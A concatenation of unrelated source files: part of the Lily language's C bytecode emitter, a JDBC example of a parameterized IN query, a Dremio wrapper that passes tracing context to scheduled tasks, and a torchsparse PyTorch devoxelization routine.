emit->patch_pos++; } else write_2(emit, o_jump, emit->loop_start); } lily_ast_reset_pool(ap); } /* lily_emit_variant_decompose This function writes out an o_variant_decompose instruction based upon the type given. The target(s) of the decompose are however many vars that the variant calls for, and pulled from the top of the symtab's vars. Assumptions: * The most recent vars that have been added to the symtab are the ones that are to get the values. * The given variant type actually has inner values (empty variants should never be sent here). 
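
   A sketch of the generated code for a variant carrying two values
   (register numbers are made up):

       o_variant_decompose, <line>, <match sym reg>, 2, <var 1 reg>, <var 2 reg>

   The targets are pulled from the most recently declared vars, newest
   first, which is why the loop below fills the slots in reverse.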
*/ void lily_emit_variant_decompose(lily_emit_state *emit, lily_type *variant_type) { int value_count = variant_type->subtype_count - 1; int i; write_prep(emit, 4 + value_count); emit->code[emit->code_pos ] = o_variant_decompose; emit->code[emit->code_pos+1] = *(emit->lex_linenum); emit->code[emit->code_pos+2] = emit->block->match_sym->reg_spot; emit->code[emit->code_pos+3] = value_count; /* Since this function is called immediately after declaring the last var that will receive the decompose, it's safe to pull the vars directly from symtab's var chain. */ lily_var *var_iter = emit->symtab->active_import->var_chain; /* Go down because the vars are linked from newest -> oldest. If this isn't done, then the first var will get the last value in the variant, the second will get the next-to-last value, etc. */ for (i = value_count - 1;i >= 0;i--) { emit->code[emit->code_pos+4+i] = var_iter->reg_spot; var_iter = var_iter->next; } emit->code_pos += 4 + value_count; } /* lily_emit_add_match_case This function is called by parser with a valid index of some variant class within the current match enum class. This is responsible for ensuring that a class does not have two cases for it. Additionally, this function also writes a jump at the end of every case that will be patched to the match block's end. Any vars from previous match cases are also wiped out here, as they're no longer valid now. */ int lily_emit_add_match_case(lily_emit_state *emit, int pos) { int block_offset = emit->block->match_case_start; int is_first_case = 1, ret = 1; int i; for (i = emit->block->match_case_start; i < emit->match_case_pos; i++) { if (emit->match_cases[i] == 1) { is_first_case = 0; break; } } if (emit->match_cases[block_offset + pos] == 0) { emit->match_cases[block_offset + pos] = 1; /* Every case added after the first needs to write an exit jump before any code. This makes it so the previous branch jumps outside the match instead of falling through (very bad, in this case). */ if (is_first_case == 0) { write_2(emit, o_jump, 0); if (emit->patch_pos == emit->patch_size) grow_patches(emit); emit->patches[emit->patch_pos] = emit->code_pos - 1; emit->patch_pos++; } /* Patch the o_match_dispatch spot the corresponds with this class so that it will jump to the current location. Oh, and make sure to do it AFTER writing the jump, or the dispatch will go to the exit jump. */ emit->code[emit->block->match_code_start + pos] = emit->code_pos - emit->block->jump_offset; /* This is necessary to keep vars created from the decomposition of one class from showing up in subsequent cases. */ lily_var *v = emit->block->var_start; if (v != emit->symtab->active_import->var_chain) lily_hide_block_vars(emit->symtab, v); } else ret = 0; return ret; } /* lily_emit_eval_match_expr This function is called by parser with an expression to switch on for 'match'. This evaluates the given expression, checks it, and then sets up the current block with the appropriate information for the match. 
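
   A sketch of what gets written (slot values are made up):

       o_match_dispatch, <line>, <match result reg>, <case count>, 0, 0, ...

   There is one zeroed jump slot per variant of the enum class; each slot is
   patched later by lily_emit_add_match_case when its case is seen.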
*/ void lily_emit_eval_match_expr(lily_emit_state *emit, lily_ast_pool *ap) { lily_ast *ast = ap->root; lily_block *block = emit->block; eval_enforce_value(emit, ast, NULL, "Match expression has no value.\n"); if ((ast->result->type->cls->flags & CLS_ENUM_CLASS) == 0 || ast->result->type->cls->id == SYM_CLASS_ANY) { lily_raise(emit->raiser, lily_SyntaxError, "Match expression is not an enum class value.\n"); } int match_cases_needed = ast->result->type->cls->variant_size; if (emit->match_case_pos + match_cases_needed > emit->match_case_size) grow_match_cases(emit); block->match_case_start = emit->match_case_pos; /* This is how the emitter knows that no cases have been given yet. */ int i; for (i = 0;i < match_cases_needed;i++) emit->match_cases[emit->match_case_pos + i] = 0; emit->match_case_pos += match_cases_needed; block->match_code_start = emit->code_pos + 4; block->match_sym = (lily_sym *)ast->result; write_prep(emit, 4 + match_cases_needed); emit->code[emit->code_pos ] = o_match_dispatch; emit->code[emit->code_pos+1] = *(emit->lex_linenum); emit->code[emit->code_pos+2] = ast->result->reg_spot; emit->code[emit->code_pos+3] = match_cases_needed; for (i = 0;i < match_cases_needed;i++) emit->code[emit->code_pos + 4 + i] = 0; emit->code_pos += 4 + i; lily_ast_reset_pool(ap); } /* lily_emit_finalize_for_in This function takes the symbols used in a for..in loop and writes out the appropriate code to start off a for loop. This should be done at the very end of a for..in loop, after the 'by' expression has been collected. * user_loop_var: This is the user var that will have the range value written to it. * for_start: The var holding the start of the range. * for_end: The var holding the end of the range. * for_step: The var holding the step of the range. This is NULL if the user did not specify a step. * line_num: A line number for writing code to be run before the actual for code. */ void lily_emit_finalize_for_in(lily_emit_state *emit, lily_var *user_loop_var, lily_var *for_start, lily_var *for_end, lily_var *for_step, int line_num) { lily_class *cls = emit->symtab->integer_class; int have_step = (for_step != NULL); if (have_step == 0) for_step = lily_emit_new_scoped_var(emit, cls->type, "(for step)"); lily_sym *target; /* Global vars cannot be used directly, because o_for_setup and o_integer_for expect local registers. */ if (user_loop_var->function_depth == 1) target = (lily_sym *)get_storage(emit, user_loop_var->type); else target = (lily_sym *)user_loop_var; write_prep(emit, 16 + ((target != (lily_sym *)user_loop_var) * 8)); emit->code[emit->code_pos ] = o_for_setup; emit->code[emit->code_pos+1] = line_num; emit->code[emit->code_pos+2] = target->reg_spot; emit->code[emit->code_pos+3] = for_start->reg_spot; emit->code[emit->code_pos+4] = for_end->reg_spot; emit->code[emit->code_pos+5] = for_step->reg_spot; /* This value is used to determine if the step needs to be calculated. */ emit->code[emit->code_pos+6] = !have_step; if (target != (lily_sym *)user_loop_var) { emit->code[emit->code_pos+7] = o_set_global; emit->code[emit->code_pos+8] = line_num; emit->code[emit->code_pos+9] = target->reg_spot; emit->code[emit->code_pos+10] = user_loop_var->reg_spot; emit->code_pos += 4; } /* for..in is entered right after 'for' is seen. However, range values can be expressions. This needs to be fixed, or the loop will jump back up to re-eval those expressions. */ emit->loop_start = emit->code_pos+9; /* Write a jump to the inside of the loop. 
This prevents the value from being incremented before being seen by the inside of the loop. */ emit->code[emit->code_pos+7] = o_jump; emit->code[emit->code_pos+8] = (emit->code_pos - emit->block->jump_offset) + 16; emit->code[emit->code_pos+9] = o_integer_for; emit->code[emit->code_pos+10] = line_num; emit->code[emit->code_pos+11] = target->reg_spot; emit->code[emit->code_pos+12] = for_start->reg_spot; emit->code[emit->code_pos+13] = for_end->reg_spot; emit->code[emit->code_pos+14] = for_step->reg_spot; emit->code[emit->code_pos+15] = 0; if (target != (lily_sym *)user_loop_var) { emit->code[emit->code_pos+16] = o_set_global; emit->code[emit->code_pos+17] = line_num; emit->code[emit->code_pos+18] = target->reg_spot; emit->code[emit->code_pos+19] = user_loop_var->reg_spot; emit->code_pos += 4; } emit->code_pos += 16; if (emit->patch_pos == emit->patch_size) grow_patches(emit); int offset; if (target == (lily_sym *)user_loop_var) offset = 1; else offset = 5; emit->patches[emit->patch_pos] = emit->code_pos - offset; emit->patch_pos++; } void lily_emit_eval_lambda_body(lily_emit_state *emit, lily_ast_pool *ap, lily_type *wanted_type, int did_resolve) { if (wanted_type && wanted_type->cls->id == SYM_CLASS_GENERIC && did_resolve == 0) { wanted_type = lily_ts_easy_resolve(emit->ts, wanted_type); did_resolve = 1; } eval_tree(emit, ap->root, wanted_type, did_resolve); if (ap->root->result != NULL) { /* Type inference has to be done here, because the callers won't know to do it. This is similar to how return has to do this too. But don't error for the wrong type: Instead, let the info bubble upward to something that will know the full types in play. */ if (wanted_type != NULL && ap->root->result->type != wanted_type) type_matchup(emit, wanted_type, ap->root); write_3(emit, o_return_val, ap->root->line_num, ap->root->result->reg_spot); } /* It's important to NOT increase the count of expressions here. If it were to be increased, then the expression holding the lambda would think it isn't using any storages (and start writing over the ones that it is actually using). */ } /* lily_emit_break This writes a break (jump to the end of a loop) for the parser. Since it is called by parser, it needs to verify that it is called from within a loop. */ void lily_emit_break(lily_emit_state *emit) { if (emit->loop_start == -1) { /* This is called by parser on the source line, so do not adjust the raiser. */ lily_raise(emit->raiser, lily_SyntaxError, "'break' used outside of a loop.\n"); } if (emit->patch_pos == emit->patch_size) grow_patches(emit); write_pop_inner_try_blocks(emit); /* Write the jump, then figure out where to put it. */ write_2(emit, o_jump, 0); inject_patch_into_block(emit, find_deepest_loop(emit), emit->code_pos - 1); } /* lily_emit_continue The parser wants to write a jump to the top of the current loop (continue keyword). */ void lily_emit_continue(lily_emit_state *emit) { /* This is called by parser on the source line, so do not adjust the raiser. */ if (emit->loop_start == -1) { lily_raise(emit->raiser, lily_SyntaxError, "'continue' used outside of a loop.\n"); } write_pop_inner_try_blocks(emit); write_2(emit, o_jump, emit->loop_start); } /* lily_emit_return This handles the 'return' keyword for the parser. If the current function DOES return a value, then ast should NOT be NULL. The ast given will be evaluated and the type checked. If it does not, then ast should be NULL. 
*/ void lily_emit_return(lily_emit_state *emit, lily_ast *ast) { if (emit->function_depth == 1) lily_raise(emit->raiser, lily_SyntaxError, "'return' used outside of a function.\n"); if (ast) { lily_type *ret_type = emit->top_function_ret; eval_enforce_value(emit, ast, ret_type, "'return' expression has no value.\n"); if (ast->result->type != ret_type && type_matchup(emit, ret_type, ast) == 0) { lily_raise_adjusted(emit->raiser, ast->line_num, lily_SyntaxError, "return expected type '^T' but got type '^T'.\n", ret_type, ast->result->type); } } write_pop_inner_try_blocks(emit); if (ast) { write_3(emit, o_return_val, ast->line_num, ast->result->reg_spot); emit->block->last_return = emit->code_pos; } else write_2(emit, o_return_noval, *emit->lex_linenum); } /* lily_emit_update_function_block This is called at the opening of a new class, before any user code. This writes an initialization for the hidden self variable. */ void lily_emit_update_function_block(lily_emit_state *emit, lily_class *decl_class, int generic_count, lily_type *ret_type) { emit->top_function_ret = ret_type; emit->block->generic_count = generic_count; if (decl_class) { /* The most recent function is the constructor for this class, which will always return a class instance. Since it's also the function var (and the return of a function is always [0], this works. */ lily_type *self_type = emit->block->function_var->type->subtypes[0]; lily_storage *self = get_storage(emit, self_type); emit->block->self = self; write_3(emit, o_new_instance, *emit->lex_linenum, self->reg_spot); } } /* lily_emit_try This should be called after adding a TRY block. This registers a try and mentions the line in which it starts (for debug). At the end of a 'try' block, there is an o_pop_try that gets written to unregister this try from the vm. Similarly, write_pop_try_blocks is called for each current 'try' when a continue/break/return is called to exit any current 'try' entries. */ void lily_emit_try(lily_emit_state *emit, int line_num) { write_3(emit, o_push_try, line_num, 0); if (emit->patch_pos == emit->patch_size) grow_patches(emit); emit->patches[emit->patch_pos] = emit->code_pos - 1; emit->patch_pos++; } /* lily_emit_raise Process the given ast and write an instruction that will attempt to raise the resulting value. The ast is checked to ensure it can be raised. */ void lily_emit_raise(lily_emit_state *emit, lily_ast *ast) { eval_enforce_value(emit, ast, NULL, "'raise' expression has no value.\n"); lily_class *result_cls = ast->result->type->cls; lily_class *except_cls = lily_find_class(emit->symtab, NULL, "Exception"); if (lily_check_right_inherits_or_is(except_cls, result_cls) == 0) { lily_raise(emit->raiser, lily_SyntaxError, "Invalid class '%s' given to raise.\n", result_cls->name); } write_3(emit, o_raise, ast->line_num, ast->result->reg_spot); } /* lily_emit_except This handles writing an 'except' block. It should be called after calling to change the current block to a TRY_EXCEPT block. cls: The class that this 'except' will catch. except_var: If an 'as x' clause is specified, this is the var that will be given the exception value. If there is no clause, then the parser will send NULL. line_num: The line on which the 'except' starts. 
*/ void lily_emit_except(lily_emit_state *emit, lily_class *cls, lily_var *except_var, int line_num) { lily_type *except_type = cls->type; lily_sym *except_sym = (lily_sym *)except_var; if (except_sym == NULL) except_sym = (lily_sym *)get_storage(emit, except_type); write_5(emit, o_except, line_num, 0, (except_var != NULL), except_sym->reg_spot); if (emit->patch_pos == emit->patch_size) grow_patches(emit); emit->patches[emit->patch_pos] = emit->code_pos - 3; emit->patch_pos++; } /* lily_prepare_main This is called before __main__ is about to be executed (which happens at eof for normal files, or for each ?> when doing tags. This will prepare type information for __main__'s global registers, and write o_return_from_vm at the end of __main__'s code. */ void lily_prepare_main(lily_emit_state *emit, lily_import_entry *import_iter) { /* Whenever any packages are loaded, the vars are created as globals, instead of trying to create some 'backing' value. Because of that, this must work through every import loaded to discover all the globals. Additionally, the current var list must also be loaded. */ lily_function_val *f = emit->top_function; int register_count = emit->main_block->next_reg_spot; lily_register_info *info = lily_realloc(emit->top_function->reg_info, register_count * sizeof(lily_register_info)); while (import_iter) { add_var_chain_to_info(emit, info, import_iter->var_chain, NULL); import_iter = import_iter->root_next; } add_var_chain_to_info(emit, info, emit->symtab->active_import->var_chain, NULL); add_storage_chain_to_info(info, emit->block->storage_start); /* Ensure that there are at least 16 code slots after __main__'s code. It is possible for an exception to dynaload at vm time, and that will want to write initializing code into __main__ past where __main__'s code is. This may, in turn, cause code to be resized. Since __main__'s code is a shallow reference to emitter->code, that's really, really bad. This prevents that, by setting up enough space that any dynaloaded code will not be large enough to resize emitter->code. */ write_prep(emit, 16); write_1(emit, o_return_from_vm); /* To simplify things, __main__'s code IS emitter->code. There's no reason to give it a private block of code, since __main__'s code is wiped on the next pass anyway. */ f->code = emit->code; f->len = emit->code_pos; f->reg_info = info; f->reg_count = register_count; } /* lily_reset_main (tagged mode) This is called after __main__ is executed to prepare __main__ for new code. */ void lily_reset_main(lily_emit_state *emit) { emit->code_pos = 0; } /* lily_emit_enter_block Enter a block of a given type. This only handles block states, not multi/single line information. */ void lily_emit_enter_block(lily_emit_state *emit, int block_type) { lily_block *new_block; if (emit->block->next == NULL) { new_block = lily_malloc(sizeof(lily_block)); emit->block->next = new_block; new_block->prev = emit->block; new_block->next = NULL; } else new_block = emit->block->next; new_block->block_type = block_type; new_block->var_start = emit->symtab->active_import->var_chain; new_block->class_entry = NULL; new_block->self = NULL; new_block->generic_count = 0; new_block->patch_start = emit->patch_pos; if ((block_type & BLOCK_FUNCTION) == 0) { /* Non-functions will continue using the storages that the parent uses. Additionally, the same technique is used to allow loop starts to bubble upward until a function gets in the way. 
*/ new_block->storage_start = emit->block->storage_start; new_block->jump_offset = emit->block->jump_offset; if (IS_LOOP_BLOCK(block_type)) emit->loop_start = emit->code_pos; } else { lily_var *v = emit->symtab->active_import->var_chain; if (block_type & BLOCK_CLASS) { emit->current_class = emit->symtab->active_import->class_chain; new_block->class_entry = emit->symtab->active_import->class_chain; } char *class_name; v->parent = emit->current_class; if (v->parent) class_name = v->parent->name; else class_name = NULL; lily_function_val *fval = lily_new_native_function_val( class_name, v->name); lily_tie_function(emit->symtab, v, fval); if (emit->function_depth >= 2 && (emit->block->block_type & BLOCK_CLASS) == 0 && (block_type == BLOCK_FUNCTION)) { /* This isn't a class method and it isn't a lambda. Close over the function now, on the assumption that it may use upvalues. */ close_over_sym(emit, (lily_sym *)v); write_4(emit, o_create_function, v->reg_spot, 0, emit->closed_pos - 1); if (emit->patch_pos == emit->patch_size) grow_patches(emit); emit->patches[emit->patch_pos] = emit->code_pos - 2; emit->patch_pos++; /* THIS IS EXTREMELY IMPORTANT. This patch belongs to the current block, not the block that was just entered. If this is not done, then the block entered will write down the patch. That's bad. */ new_block->patch_start = emit->patch_pos; } new_block->next_reg_spot = 0; /* This causes vars within this imported file to be seen as global vars, instead of locals. Without this, the interpreter gets confused and thinks the imported file's globals are really upvalues. */ if (block_type != BLOCK_FILE) emit->function_depth++; emit->function_block = new_block; if (block_type & BLOCK_LAMBDA) emit->lambda_depth++; /* This function's storages start where the unused ones start, or NULL if all are currently taken. */ new_block->storage_start = emit->unused_storage_start; new_block->function_var = v; new_block->function_value = fval; new_block->last_return = -1; new_block->code_start = emit->code_pos; new_block->jump_offset = emit->code_pos; emit->top_function = fval; emit->top_var = v; } new_block->closed_start = emit->closed_pos; emit->block = new_block; } lily_block *find_block_of_type(lily_emit_state *emit, int type) { lily_block *block_iter = emit->block->prev; while (block_iter) { if (block_iter->block_type & type) break; block_iter = block_iter->prev; } return block_iter; } /* lily_emit_leave_block Leave a block. This includes a check for trying to leave from __main__. This hides vars that are no longer in scope, as well as finializing functions. */ void lily_emit_leave_block(lily_emit_state *emit) { lily_var *v; lily_block *block; int block_type; if (emit->block->prev == NULL) lily_raise(emit->raiser, lily_SyntaxError, "'}' outside of a block.\n"); block = emit->block; block_type = block->block_type; /* These blocks need to jump back up when the bottom is hit. */ if (block_type == BLOCK_WHILE || block_type == BLOCK_FOR_IN) write_2(emit, o_jump, emit->loop_start - block->jump_offset); else if (block_type == BLOCK_MATCH) { ensure_proper_match_block(emit); emit->match_case_pos = emit->block->match_case_start; } v = block->var_start; if ((block_type & BLOCK_FUNCTION) == 0) { write_block_patches(emit, emit->code_pos - block->jump_offset); lily_hide_block_vars(emit->symtab, v); } else leave_function(emit, block); emit->block = emit->block->prev; if (IS_LOOP_BLOCK(block_type)) { lily_block *prev_loop_block = find_deepest_loop(emit); emit->loop_start = (prev_loop_block) ? 
prev_loop_block->code_start : -1; } } /* lily_emit_write_import_call This is called by the parser after an imported file has left. The var is always the special __import__ function holding the contents of the imported file (which takes 0 args and returns nothing). */ void lily_emit_write_import_call(lily_emit_state *emit, lily_var *var) { write_prep(emit, 6); emit->code[emit->code_pos] = o_function_call; emit->code[emit->code_pos+1] = *emit->lex_linenum; /* 1 means that +3 is a readonly var's spot. */ emit->code[emit->code_pos+2] = 1; emit->code[emit->code_pos+3] = var->reg_spot; /* 0 arguments collected. */ emit->code[emit->code_pos+4] = 0; /* This does not return a value. */ emit->code[emit->code_pos+5] = -1; emit->code_pos += 6; } /* lily_emit_write_optargs This function writes o_setup_optargs for the parser. It's currently called near the beginning of any function that uses optional arguments. reg_spots: A series of pairs to write out. Each pair is a literal's register spot, then a var's register spot. count: The total number of spots to write (not the number of pairs). Parser writes optargs in pairs so the it doesn't have to potentially resize and shift things over for large optarg blocks. However, debug and vm would like optargs to be written with the literals first in a block, then the vars next in a block. */ void lily_emit_write_optargs(lily_emit_state *emit, uint16_t *reg_spots, uint16_t count) { write_prep(emit, count + 2); emit->code[emit->code_pos] = o_setup_optargs; emit->code[emit->code_pos+1] = count; emit->code_pos += 2; int i, j; for (j = 0;j < 2;j++) { for (i = j;i < count;i += 2) { emit->code[emit->code_pos] = reg_spots[i]; emit->code_pos++; } } } lily_var *lily_emit_new_scoped_var(lily_emit_state *emit, lily_type *type, char *name) { lily_var *new_var = lily_new_raw_var(emit->symtab, type, name); if (emit->function_depth == 1) { new_var->reg_spot = emit->main_block->next_reg_spot; emit->main_block->next_reg_spot++; } else { new_var->reg_spot = emit->function_block->next_reg_spot; emit->function_block->next_reg_spot++; } new_var->function_depth = emit->function_depth; return new_var; } lily_var *lily_emit_new_define_var(lily_emit_state *emit, lily_type *type, char *name) { lily_var *new_var = lily_new_raw_var(emit->symtab, type, name); new_var->reg_spot = emit->symtab->next_readonly_spot; emit->symtab->next_readonly_spot++; new_var->function_depth = 1; new_var->flags |= VAR_IS_READONLY; return new_var; } lily_var *lily_emit_new_dyna_define_var(lily_emit_state *emit, lily_foreign_func func, lily_import_entry *import, lily_type *type, char *name) { lily_var *new_var = lily_new_raw_unlinked_var(emit->symtab, type, name); new_var->next = import->var_chain; import->var_chain = new_var; new_var->reg_spot = emit->symtab->next_readonly_spot; emit->symtab->next_readonly_spot++; new_var->function_depth = 1; new_var->flags |= VAR_IS_READONLY; /* Make sure to use new_var->name, because the name parameter is a shallow copy of lex->label (and will be mutated). 
*/ lily_function_val *func_val = lily_new_foreign_function_val(func, NULL, new_var->name); lily_tie_builtin(emit->symtab, new_var, func_val); return new_var; } lily_var *lily_emit_new_dyna_method_var(lily_emit_state *emit, lily_foreign_func func, lily_class *cls, lily_type *type, char *name) { lily_var *new_var = lily_new_raw_unlinked_var(emit->symtab, type, name); new_var->parent = cls; new_var->function_depth = 1; new_var->flags |= VAR_IS_READONLY; new_var->reg_spot = emit->symtab->next_readonly_spot; emit->symtab->next_readonly_spot++; new_var->next = cls->call_chain; cls->call_chain = new_var; lily_function_val *func_val = lily_new_foreign_function_val(func, cls->name, new_var->name); lily_tie_function(emit->symtab, new_var, func_val); return new_var; } lily_var *lily_emit_new_dyna_var(lily_emit_state *emit, lily_import_entry *import, lily_type *type, char *name) { lily_var *new_var = lily_new_raw_unlinked_var(emit->symtab, type, name); new_var->reg_spot = emit->main_block->next_reg_spot; emit->main_block->next_reg_spot++; new_var->function_depth = 1; new_var->next = import->var_chain; import->var_chain = new_var; return new_var; } /* Create the first block that will represent __main__, as well as __main__ itself. This first block will never be exited from. */ void lily_emit_enter_main(lily_emit_state *emit) { /* This adds the first storage and makes sure that the emitter can always know that emit->unused_storage_start is never NULL. */ add_storage(emit); lily_type *main_type = lily_new_type(emit->symtab, emit->symtab->function_class); /* This next part is only ok because __main__ is the first function and it is not possible for this type to be a duplicate of anything else. */ main_type->subtypes = lily_malloc(2 * sizeof(lily_type)); main_type->subtypes[0] = NULL; main_type->subtype_count = 1; main_type->generic_pos = 0; main_type->flags = 0; lily_var *main_var = lily_new_raw_var(emit->symtab, main_type, "__main__"); main_var->reg_spot = 0; main_var->function_depth = 1; main_var->flags |= VAR_IS_READONLY; emit->symtab->next_readonly_spot++; lily_block *main_block = lily_malloc(sizeof(lily_block)); lily_function_val *main_function = lily_new_native_function_val( NULL, main_var->name); emit->symtab->main_var = main_var; emit->symtab->main_function = main_function; /* __main__ is given two refs so that it must go through a custom deref to be destroyed. This is because the names in the function info it has are shared with vars that are still around. */ main_function->refcount++; lily_tie_function(emit->symtab, main_var, main_function); main_block->prev = NULL; main_block->next = NULL; main_block->block_type = BLOCK_FUNCTION; main_block->function_var = main_var; main_block->storage_start = emit->all_storage_start; main_block->class_entry = NULL; main_block->generic_count = 0; main_block->function_value = main_function; main_block->self = NULL; main_block->code_start = 0; main_block->jump_offset = 0; main_block->next_reg_spot = 0; emit->top_function = main_function; emit->top_var = main_var; emit->block = main_block; emit->function_depth++; emit->main_block = main_block; emit->function_block = main_block; }
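The comment inside lily_emit_write_optargs above explains that the parser hands over optarg register spots as interleaved (literal, var) pairs, while debug and the vm want all literal spots in one block followed by all var spots; the nested two-pass loop performs that reordering. A minimal stand-alone sketch of the same reordering, written in Java purely for illustration — the class, method name, and sample values are hypothetical and not part of Lily:

public final class OptargReorderSketch {
    // Pass 0 copies indices 0, 2, 4, ... (the literal spots);
    // pass 1 copies indices 1, 3, 5, ... (the var spots).
    static int[] deinterleavePairs(int[] regSpots) {
        int[] out = new int[regSpots.length];
        int pos = 0;
        for (int pass = 0; pass < 2; pass++) {
            for (int i = pass; i < regSpots.length; i += 2) {
                out[pos++] = regSpots[i];
            }
        }
        return out;
    }

    public static void main(String[] args) {
        // {lit, var, lit, var, lit, var} -> [10, 11, 12, 3, 4, 5]
        System.out.println(java.util.Arrays.toString(
                deinterleavePairs(new int[] {10, 3, 11, 4, 12, 5})));
    }
}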
72,864
1,139
<filename>CoreJavaProjects/JDBCPreparedStatementIN/src/com/journaldev/jdbc/preparedstatement/in/JDBCPreparedStatementDynamic.java package com.journaldev.jdbc.preparedstatement.in; import java.sql.Connection; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; public class JDBCPreparedStatementDynamic { public static void printData(int[] ids){ String query = createQuery(ids.length); System.out.println("Query="+query); Connection con = DBConnection.getConnection(); PreparedStatement ps = null; ResultSet rs = null; try { ps = con.prepareStatement(query); for(int i = 1; i <=ids.length; i++){ ps.setInt(i, ids[i-1]); } rs = ps.executeQuery(); while(rs.next()){ System.out.println("Employee ID="+rs.getInt("empid")+", Name="+rs.getString("name")); } //close the resultset here try{ rs.close(); } catch(SQLException e){} } catch (SQLException e) { e.printStackTrace(); }finally{ try { ps.close(); con.close(); } catch (SQLException e) { e.printStackTrace(); } } } private static String createQuery(int length) { String query = "select empid, name from Employee where empid in ("; StringBuilder queryBuilder = new StringBuilder(query); for( int i = 0; i< length; i++){ queryBuilder.append(" ?"); if(i != length -1) queryBuilder.append(","); } queryBuilder.append(")"); return queryBuilder.toString(); } }
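A brief usage sketch for the dynamic IN-clause helper above, assuming the Employee table and DBConnection from the surrounding tutorial code exist; the id values are made up. Binding each id through setInt keeps the values out of the SQL text itself, which is what protects this pattern against SQL injection:

// Assumed to live in the same package as JDBCPreparedStatementDynamic.
public class JDBCPreparedStatementDynamicDemo {
    public static void main(String[] args) {
        // Builds "select empid, name from Employee where empid in ( ?, ?, ?)"
        // and binds 1, 5 and 9 to the three placeholders before executing.
        JDBCPreparedStatementDynamic.printData(new int[] {1, 5, 9});
    }
}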
596
1,085
<gh_stars>1000+ /* * Copyright (C) 2017-2019 Dremio Corporation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.dremio.common.concurrent; import java.util.concurrent.Callable; import java.util.concurrent.ScheduledExecutorService; import java.util.concurrent.ScheduledFuture; import java.util.concurrent.TimeUnit; import io.opentracing.Tracer; public class ScheduledContextMigratingExecutorService<E extends ScheduledExecutorService> extends ContextMigratingExecutorService implements ScheduledExecutorService { public ScheduledContextMigratingExecutorService(E delegate, Tracer tracer) { super(delegate, tracer); } @Override public ScheduledFuture<?> schedule(Runnable command, long delay, TimeUnit unit) { return ((ScheduledExecutorService)getDelegate()).schedule(decorate(command), delay, unit); } @Override public <V> ScheduledFuture<V> schedule(Callable<V> callable, long delay, TimeUnit unit) { return ((ScheduledExecutorService)getDelegate()).schedule(decorate(callable), delay, unit); } @Override public ScheduledFuture<?> scheduleAtFixedRate(Runnable command, long initialDelay, long period, TimeUnit unit) { return ((ScheduledExecutorService)getDelegate()).scheduleAtFixedRate(decorate(command), initialDelay, period, unit); } @Override public ScheduledFuture<?> scheduleWithFixedDelay(Runnable command, long initialDelay, long delay, TimeUnit unit) { return ((ScheduledExecutorService)getDelegate()).scheduleWithFixedDelay(decorate(command), initialDelay, delay, unit); } }
827
428
import torch from torch.autograd import Function from torch.cuda.amp import custom_bwd, custom_fwd import torchsparse.backend __all__ = ['spdevoxelize', 'calc_ti_weights'] def calc_ti_weights(coords: torch.Tensor, idx_query: torch.Tensor, scale: float = 1) -> torch.Tensor: with torch.no_grad(): p = coords if scale != 1: pf = torch.floor(coords / scale) * scale else: pf = torch.floor(coords) pc = pf + scale x = p[:, 0].view(-1, 1) y = p[:, 1].view(-1, 1) z = p[:, 2].view(-1, 1) xf = pf[:, 0].view(-1, 1).float() yf = pf[:, 1].view(-1, 1).float() zf = pf[:, 2].view(-1, 1).float() xc = pc[:, 0].view(-1, 1).float() yc = pc[:, 1].view(-1, 1).float() zc = pc[:, 2].view(-1, 1).float() w0 = (xc - x) * (yc - y) * (zc - z) w1 = (xc - x) * (yc - y) * (z - zf) w2 = (xc - x) * (y - yf) * (zc - z) w3 = (xc - x) * (y - yf) * (z - zf) w4 = (x - xf) * (yc - y) * (zc - z) w5 = (x - xf) * (yc - y) * (z - zf) w6 = (x - xf) * (y - yf) * (zc - z) w7 = (x - xf) * (y - yf) * (z - zf) w = torch.cat([w0, w1, w2, w3, w4, w5, w6, w7], dim=1) w = w.transpose(1, 0).contiguous() if scale != 1: w /= scale ** 3 w[idx_query == -1] = 0 w /= torch.sum(w, dim=0) + 1e-8 return w class DevoxelizeFunction(Function): @staticmethod @custom_fwd(cast_inputs=torch.half) def forward(ctx, feats: torch.Tensor, coords: torch.Tensor, weights: torch.Tensor) -> torch.Tensor: feats = feats.contiguous() coords = coords.contiguous().int() weights = weights.contiguous() if feats.device.type == 'cuda': output = torchsparse.backend.devoxelize_forward_cuda( feats, coords, weights) elif feats.device.type == 'cpu': output = torchsparse.backend.devoxelize_forward_cpu( feats, coords, weights) else: device = feats.device output = torchsparse.backend.devoxelize_forward_cpu( feats.cpu(), coords.cpu(), weights.cpu()).to(device) ctx.for_backwards = (coords, weights, feats.shape[0]) return output @staticmethod @custom_bwd def backward(ctx, grad_output: torch.Tensor): coords, weights, input_size = ctx.for_backwards grad_output = grad_output.contiguous() if grad_output.device.type == 'cuda': grad_feats = torchsparse.backend.devoxelize_backward_cuda( grad_output, coords, weights, input_size) elif grad_output.device.type == 'cpu': grad_feats = torchsparse.backend.devoxelize_backward_cpu( grad_output, coords, weights, input_size) else: device = grad_output.device grad_feats = torchsparse.backend.devoxelize_backward_cpu( grad_output.cpu(), coords.cpu(), weights.cpu(), input_size).to(device) return grad_feats, None, None def spdevoxelize(feats: torch.Tensor, coords: torch.Tensor, weights: torch.Tensor) -> torch.Tensor: return DevoxelizeFunction.apply(feats, coords, weights)
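For reference, the weight computation in calc_ti_weights above is plain trilinear interpolation, just unrolled. With p the query point, p_f the floor corner of its voxel of side s (the scale argument), and corner offsets delta = (δx, δy, δz) in {0,1}^3, the unnormalized weight the code computes is

w_{\delta} \;=\; \frac{1}{s^{3}} \prod_{d \in \{x,y,z\}}
\begin{cases}
  p_{f,d} + s - p_{d}, & \delta_{d} = 0 \\
  p_{d} - p_{f,d},     & \delta_{d} = 1
\end{cases}

after which weights of points with idx_query == -1 are zeroed and each column is normalized, w_delta <- w_delta / (sum over delta' of w_{delta'} + 1e-8). This is only a restatement of the code above, not an additional API.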
1,719
533
